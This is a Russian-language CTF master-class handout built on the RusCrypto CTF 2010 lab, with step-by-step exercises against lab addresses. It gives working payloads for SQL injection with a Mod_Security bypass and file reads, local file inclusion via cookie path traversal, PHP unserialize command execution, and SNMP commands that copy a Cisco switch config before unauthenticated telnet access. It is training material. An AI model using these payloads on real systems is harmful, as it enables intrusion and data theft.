  • 2. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 2 из 7 ОГЛАВЛЕНИЕ 1 ЗАДАНИЯ МАСТЕР КЛАССА ................................................................. 3 1.1 ПРАКТИЧЕСКОЕ ЗАНЯТИЕ ЧАСТЬ 1 3 1.2 ПРАКТИЧЕСКОЕ ЗАНЯТИЕ ЧАСТЬ 2 5 1.3 ДОПОЛНИТЕЛЬНЫЕ МАТЕРИАЛЫ 7 1.3.1 СС ЫЛКИ НА ДО ПО ЛНИТЕ ЛЬН ЫЕ МА ТЕРИА ЛЫ.......................................................... 7
  • 3. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 3 из 7 1 Задания мастер класса 1.1 Практическое занятие, часть 1 Действие Описание Примечание: Для выполнения заданий «Практическогозанятия 1» необходимо использовать браузер Mozilla Firefox с установленнымдополнением«TamperData» (https://addons.mozilla.org/firefox/addon/966). 1. Обнаружить уязвимость SQL Injection a. Откройте интерфейс http://192.168.0.1/ b. Укажите в качестве значений «пицца»и «скорость доставки» произвольные данные. c. Путем перехвата данных средствами «TamperData» вкачестве значения «time» укажите 1' d. Вы должны увидеть следующее сообщение об ошибке: Query failed:You have an error in your SQLsyntax e. Стоит отметить,что уязвимость содержится вследующем SQL-запросе: INSERTINTO pizza (pizza,time) VALUES (".$_POST['pizza'].",".$_POST['time'].") 2. Обойти превентивные защитные механизмы (WAF) a. В том же интерфейсе укажите вкачестве значения «time» 1 unionselect b. Вы должны увидеть сообщение, свидетельствующее о блокировке запроса превентивным защитныммеханизмом Mod_Security: Method NotImplemented c. Вернитесь на предыдущую страницуи воспользуйтесьметодомобхода правил противодействия атаке «Внедрение операторов SQL» в Mod_Security.Для этого в качестве значения «time» укажите: /*!unionselect*/ /*!12345unionselect*/ d. Полученное сообщениеоб ошибке (…syntax to use near 'unionselect*/)'…) свидетельствует о том,что существуетвозможность контролировать поступающие к веб-приложениюзапросы,которые,всвою очередь,используются для генерации SQL-запросов в обход политики безопасности Web ApplicationFirewall. 3. Воспользоваться уязвимостью SQL Injection для получения «флага» a. Для получения флага воспользуйтесьтехникой проведения атаки Error-based SQL Injection: select1 from(selectcount(*),concat(1,floor(rand(0)*2))x from pizza group by x)a b. Обратите внимание,что вбольшинстве версий MySQLприведенный выше метод позволяетполучить не больше 153 символовполезной нагрузки (и меньше!). Поэтому для получения флага в данном случае можноиспользовать следующий запрос:selectmid(load_file('/YOURFLAG.TXT'),451,32) c. Таким образом,результирующий запрос для проведения атаки приметследующий вид: /*!12345(select1 from(selectcount(*),concat((select mid(load_file('/YOURFLAG.TXT'),451,32)),floor(rand(0)*2))x from pizza group by x)a)*/
  • 4. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 4 из 7 Действие Описание 4. Воспользоваться уязвимостью Local File Including для получения «флага» a. Прежде чем перейти кэксплуатации уязвимости «LocalFile Including» авторизуйтесь в интерфейсе http://192.168.0.1/admin.php Имя пользователя:admin Пароль:1234567 b. После успешной авторизации повторите запрос.При этом измените значение Cookie[lang]на следующую строку: non/../../../../../../etc/hosts c. Вы должны увидеть следующее сообщение об ошибке: Warning:include_once(non/../../../../../../etc/hosts.php) Попробуйте заменить «hosts»на «passwd». Попробуйте заменить «hosts»на «hosts%00». d. Для того чтобы избавится отдобавляемогорасширения файла («.php»), воспользуйтесь методом замены«ядовитого нуля»в PHP < v.5.3.3. Следующая конструкция позволяетосуществить атаку: non/../../../../../../YOURFLAG.TXT/./.[496]/./. Попробуйте воспользоваться уязвимостью «Remote File Including» втом же уязвимомпараметре. Примечание: Следующее задание требуетперевода состояния виртуальной инфраструктурына уровень выше.Если Вы закончили предыдущие задания раньше остальныхучастников,попробуйте воспользоваться уязвимостями типа «XPath Injection» и «SQLInjection» на интерфейсеhttp://192.168.0.2. Для получения «флага»при эксплуатации уязвимости «SQLInjection» воспользуйтесь функцией pg_read_file().«Флаг» содержится водном каталоге с СУБД. 5. Воспользоваться уязвимостью при вызове функции unserialize()с целью выполнения команд ОС и для получения «флага» a. Прежде,чем перейти кэксплуатации уязвимости при вызове функцииunserialize(), отключите автоматическое перенаправлениебраузера. b. Откройте интерфейс http://192.168.0.1/admin.php. Уязвимость содержится в параметре Cookie[sessid].Следующий запросвформате base64позволяетвыполнить функцию phpinfo(): O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:7:"phpinfo";i:1;s:2:"-1";}} c. Приведенный запрос ниже в том же формате позволитвыполнить команду листинга файлови каталогов в текущем каталоге веб-сервера: O:8:"Database":1:{s:8:"shutdown";a:2:{i:0;s:6:"system";i:1;s:2:"ls";}} d. Воспользуйтесь данной уязвимостью для чтения файла «/YOURFLAG.TXT». Примечание: Интерфейс для перевода строки вформатbase64доступен по адресу http://192.168.0.1/base64.php
  • 5. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 5 из 7 1.2 Практическое занятие, часть 2 Действие Описание Примечание: Для выполнения заданий «Практическогозанятия 2» необходимо использовать ПО«net-snmp» (http://www.net-snmp.org/download.html)и «Tftpd32» (http://tftpd32.jounin.net/).Опциональноможно использовать ПО «nmap» (http://nmap.org/download.html). 1. Провести выгрузку используемой конфигурации через протоколSNMP a. Проверьте доступность коммутатора Cisco путем отправки запроса ICMPEcho- Request: ping 192.168.0.10 Для аналогичныхцелей можно воспользоваться сетевым сканером nmap: nmap -sP -n 192.168.0.10 b. Вы должны увидеть, что коммутаторявляется доступным. Кроме того,можно проверить доступность порта SNMP(161/udp)и использование настроекпо умолчанию: nmap -sU -n -p 161 192.168.0.10 snmpwalk -v 1 -c public 192.168.0.10 iso.3.6.1.2.1.1.1.0 snmpwalk -v 1 -c private 192.168.0.10 iso.3.6.1.2.1.1.1.0 c. Запустите сервер TFTPDи укажите используемый каталогдля принимаемых файлов. d. Используйте команду (используемый протокол): snmpset -v 1 -c private 192.168.0.10 .1.3.6.1.4.1.9.9.96.1.1.1.1.2.<произвольное_число> integer 1 integer1 для протокола TFTP integer2 для протокола FTP integer3 для протокола RSCP Строка «1.3.6.1.4.1.9.9.96.1.1.1.1.» является фиксированнымзначениемOIDиз состава CISCO-CONFIG-COPY-MIB. e. Используйте команду (файл-источник): snmpset -v 1 -c private 192.168.0.10 .1.3.6.1.4.1.9.9.96.1.1.1.1.3.<используемое_произвольное_число> integer 4 integer1 копирование файла изсети integer2 копирование любого неконфигурационного локального файла integer3 копирование startup-config integer4 копирование running-config integer5 копирование терминального вывода f. Используйте команду (файл-назначение): snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.4. .<используемое_произвольное_число> integer 1 Значения «integer»аналогичны предыдущемупункту.
  • 6. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 6 из 7 Действие Описание g. Используйте команду (указание адреса TFTP-сервера): snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.5. <используемое_произвольное_число> address <IP_адрес_вашего_компьютера> h. Используйте команду (указание имени файла на стороне TFTP-сервера): snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.6. <используемое_произвольное_число> string config i. Используйте команду (запустить процесс копирования): snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.14. <используемое_произвольное_число> integer 1 j. Используйте команду: snmpwalk -v 1 -c private 192.168.0.10 .1.3.6.1.4.1.9.9.96.1.1.1.1.10. <используемое_произвольное_число> для того чтобы определить состояние процесса копирования,и команду: snmpset -v 1 -c private 192.168.0.10.1.3.6.1.4.1.9.9.96.1.1.1.1.14. <используемое_произвольное_число> integer 6 для того чтобы удалить созданную ячейку OID. k. На этом этапе Вы должны получить файлс конфигурацией, используемой (running- config)на коммутатореCisco. 2. Получить уровень доступа privileges 15 a. Внимательно изучите полученнуюконфигурацию коммутатора Cisco.Обратите внимание на следующие строчки: ... aaa authentication login default local-case aaa authentication login authennone ... line vty 0 3 exec-timeout 0 0 line vty 4 exec-timeout 0 0 privilege level 15 login authenticationauthen ... Подобная конфигурация устройства позволяетполучить уровень доступа privileges 15 безкакой-либо аутентификации. b. Запустите несколько окон командной строки со следующим содержимым: telnet192.168.0.10 c. Вы должны получить неавторизованный доступ кустройству Cisco.Проверить полученные привилегии можно командой: show privilege
  • 7. Мастер класс на основе инфраструктуры «РусКрипто CTF 2010» Ст раница 7 из 7 1.3 Дополнительные материалы 1.3.1 Ссылки на дополнительные материалы  http://www.ptsecurity.ru/download/PT-Ruscrypto-CTF2010.pdf  http://devteev.blogspot.com/2010/04/2010-ctf-just4fun.html  http://www.ruscrypto.org/conference/ctf/ И в светлом будущем:  http://ctf.securitylab.ru/